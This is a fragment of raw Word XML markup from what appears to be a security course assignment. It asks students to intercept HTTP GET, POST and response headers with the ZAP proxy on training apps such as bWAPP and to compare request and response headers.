      <w:r w:rsidR="005B3B47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">key on your keyboard </w:t>
      </w:r>
      <w:r w:rsidR="00132C45" w:rsidRPr="00882079">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
        </w:rPr>
        <w:t>to capture the entire screen.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C66753A" w14:textId="22550E6B" w:rsidR="00782424" w:rsidRDefault="00782424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p w14:paraId="3416D379" w14:textId="77777777" w:rsidR="00DF1AB9" w:rsidRPr="00F36A2D" w:rsidRDefault="00DF1AB9" w:rsidP="00782424">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs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1921"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DF1AB9" w:rsidRPr="006F252D" w14:paraId="5C42675E" w14:textId="77777777" w:rsidTr="00B264A1">
        <w:trPr>
          <w:trHeight w:val="683"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1980" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1F0726E1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80" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="706B37A3" w14:textId="77777777" w:rsidR="00DF1AB9" w:rsidRPr="006F252D" w:rsidRDefault="00DF1AB9" w:rsidP="00B264A1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342DA1B4" w14:textId="77777777" w:rsidR="00F36A2D" w:rsidRPr="00FF68EF" w:rsidRDefault="00F36A2D" w:rsidP="00F36A2D">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1275" w:right="27"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12E10038" w14:textId="77777777" w:rsidR="00091F75" w:rsidRDefault="00091F75" w:rsidP="00091F75">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr w:rsidR="00091F75" w:rsidSect="001B46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03A02B1" w14:textId="19BDEF66" w:rsidR="00B35CAA" w:rsidRPr="002135A4" w:rsidRDefault="00B35CAA" w:rsidP="002135A4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bookmarkStart w:id="1" w:name="_Ref516071886"/>
      <w:bookmarkStart w:id="2" w:name="_Ref516187504"/>
      <w:bookmarkStart w:id="3" w:name="_Ref516171453"/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>QUESTION 1</w:t>
      </w:r>
      <w:r w:rsidRPr="002135A4"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 w:rsidR="009F5552" w:rsidRPr="002135A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00030FC0" w:rsidRPr="002135A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="002135A4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="37B29F21" w14:textId="77777777" w:rsidR="000A2C0B" w:rsidRDefault="000A2C0B" w:rsidP="00B35CAA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AC821F0" w14:textId="5A6A3170" w:rsidR="000A2C0B" w:rsidRPr="00803E7B" w:rsidRDefault="000A2C0B" w:rsidP="00B35CAA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="00622ABD"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4DDD89EA" w14:textId="77777777" w:rsidR="000A2C0B" w:rsidRPr="00CB5E5F" w:rsidRDefault="000A2C0B" w:rsidP="00B35CAA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26BBDF01" w14:textId="7EABC896" w:rsidR="001137E5" w:rsidRPr="00657184" w:rsidRDefault="006459DD" w:rsidP="00657184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_Ref516022413"/>
      <w:bookmarkStart w:id="5" w:name="_Ref516071929"/>
      <w:r w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidR="008562B1" w:rsidRPr="008562B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Zap</w:t>
      </w:r>
      <w:r w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool</w:t>
      </w:r>
      <w:r w:rsidR="00D60C13" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to </w:t>
      </w:r>
      <w:r w:rsidR="00357397" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">intercept a </w:t>
      </w:r>
      <w:r w:rsidR="00212EB2" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>H</w:t>
      </w:r>
      <w:r w:rsidR="00303C69" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00212EB2" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">TP </w:t>
      </w:r>
      <w:r w:rsidR="00212EB2" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>G</w:t>
      </w:r>
      <w:r w:rsidR="00357397" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>et</w:t>
      </w:r>
      <w:r w:rsidR="004B0243" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Request</w:t>
      </w:r>
      <w:r w:rsidR="00DB1CBC" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header</w:t>
      </w:r>
      <w:r w:rsidR="0014421C" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00357397" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00212EB2" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="004B0243" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00357397" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">ost </w:t>
      </w:r>
      <w:r w:rsidR="004B0243" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00357397" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>equest</w:t>
      </w:r>
      <w:r w:rsidR="00DB1CBC" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header</w:t>
      </w:r>
      <w:r w:rsidR="004B0243" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, and a HTTP </w:t>
      </w:r>
      <w:r w:rsidR="004B0243" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Response</w:t>
      </w:r>
      <w:r w:rsidR="00DB1CBC" w:rsidRPr="00AA3890">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header</w:t>
      </w:r>
      <w:r w:rsidR="000B7454" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for </w:t>
      </w:r>
      <w:r w:rsidR="00303C69" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidR="00BA6BE3" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00303C69" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="008538B3" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>broken</w:t>
      </w:r>
      <w:r w:rsidR="005051FD" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> web application</w:t>
      </w:r>
      <w:r w:rsidR="00303C69" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005051FD" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your choice</w:t>
      </w:r>
      <w:r w:rsidR="00B858E1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (owaspbwap / bWAPP)</w:t>
      </w:r>
      <w:r w:rsidR="00617FDF" w:rsidRPr="00657184">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55809249" w14:textId="77777777" w:rsidR="001137E5" w:rsidRDefault="001137E5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A15410" w14:textId="013951D7" w:rsidR="006459DD" w:rsidRDefault="00854BDC" w:rsidP="00495E8A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26F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Provide a screenshot </w:t>
      </w:r>
      <w:r w:rsidR="0095315E" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidR="0095315E" w:rsidRPr="00821DF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>eac</w:t>
      </w:r>
      <w:r w:rsidR="00DF1637" w:rsidRPr="00821DF2">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidR="00DF1637" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">of the intercepted </w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="00F00222">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Get Request</w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header, HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="00F00222">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Post Request</w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Header, and HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00F02292" w:rsidRPr="00F00222">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Response Header</w:t>
      </w:r>
      <w:r w:rsidR="00F00222" w:rsidRPr="00F00222">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A90883">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2655A547" w14:textId="1C197A1F" w:rsidR="004864A3" w:rsidRPr="004864A3" w:rsidRDefault="004864A3" w:rsidP="004864A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7A06">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00052CA9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> marks</w:t>
      </w:r>
      <w:r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803E7B" w14:paraId="48FD3503" w14:textId="77777777" w:rsidTr="00803314">
        <w:trPr>
          <w:trHeight w:val="9322"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="269869AE" w14:textId="15B36C9B" w:rsidR="00803E7B" w:rsidRDefault="009352ED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9352ED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F5A44C3" wp14:editId="650CA722">
                  <wp:extent cx="5732145" cy="167703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51B9A" w14:textId="1B078118" w:rsidR="003969D3" w:rsidRDefault="003969D3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E011B" w14:textId="0F449534" w:rsidR="003969D3" w:rsidRDefault="00225233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2252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1CB671" wp14:editId="499002FD">
                  <wp:extent cx="5732145" cy="1250950"/>
                  <wp:effectExtent l="0" t="0" r="190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233" w14:paraId="35609DC8" w14:textId="77777777" w:rsidTr="00803314">
        <w:trPr>
          <w:trHeight w:val="9322"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9017" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34C3C721" w14:textId="77777777" w:rsidR="00225233" w:rsidRDefault="00225233" w:rsidP="00803E7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F6489" w14:textId="5EB5AA49" w:rsidR="00225233" w:rsidRPr="009352ED" w:rsidRDefault="00225233" w:rsidP="00803E7B">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0022523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A52A71B" wp14:editId="4FE1A8EC">
                  <wp:extent cx="5732145" cy="1221105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C2144" w14:textId="77752A28" w:rsidR="00303C69" w:rsidRDefault="00303C69" w:rsidP="00495E8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8D93E59" w14:textId="61A20598" w:rsidR="00803314" w:rsidRPr="002135A4" w:rsidRDefault="00803314" w:rsidP="00803314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7F535A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>QUESTION 1 (Contd.,)</w:t>
      </w:r>
      <w:r w:rsidR="00B712F1"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313995CE" w14:textId="77777777" w:rsidR="00803314" w:rsidRDefault="00803314" w:rsidP="00803314">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0934BF87" w14:textId="77777777" w:rsidR="00803314" w:rsidRPr="00F15C76" w:rsidRDefault="00803314" w:rsidP="0080331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15C76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F15C76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3CC5D4CB" w14:textId="77777777" w:rsidR="00803314" w:rsidRPr="00803314" w:rsidRDefault="00803314" w:rsidP="00803314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4DF356B" w14:textId="2F09D2E6" w:rsidR="00303C69" w:rsidRPr="001326F1" w:rsidRDefault="004D0685" w:rsidP="00495E8A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326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Based on your screenshots</w:t>
      </w:r>
      <w:r w:rsidR="00803314">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Q1(a)(i)</w:t>
      </w:r>
      <w:r w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00CE770A" w:rsidRPr="001C19C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>identify,</w:t>
      </w:r>
      <w:r w:rsidRPr="001C19C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> and d</w:t>
      </w:r>
      <w:r w:rsidR="00B1542F" w:rsidRPr="001C19C1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>escribe</w:t>
      </w:r>
      <w:r w:rsidR="00B1542F" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB0319" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>TWO</w:t>
      </w:r>
      <w:r w:rsidR="00B1542F" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00092F02" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>major difference</w:t>
      </w:r>
      <w:r w:rsidR="0079650B" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00092F02" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0014701C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(in terms of their content) </w:t>
      </w:r>
      <w:r w:rsidR="00092F02" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">between </w:t>
      </w:r>
      <w:r w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00BB0319" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP </w:t>
      </w:r>
      <w:r w:rsidR="00FF1248" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Request </w:t>
      </w:r>
      <w:r w:rsidR="004379C4" w:rsidRPr="0069357B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Header</w:t>
      </w:r>
      <w:r w:rsidR="006966E1" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB0319" w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidRPr="001326F1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
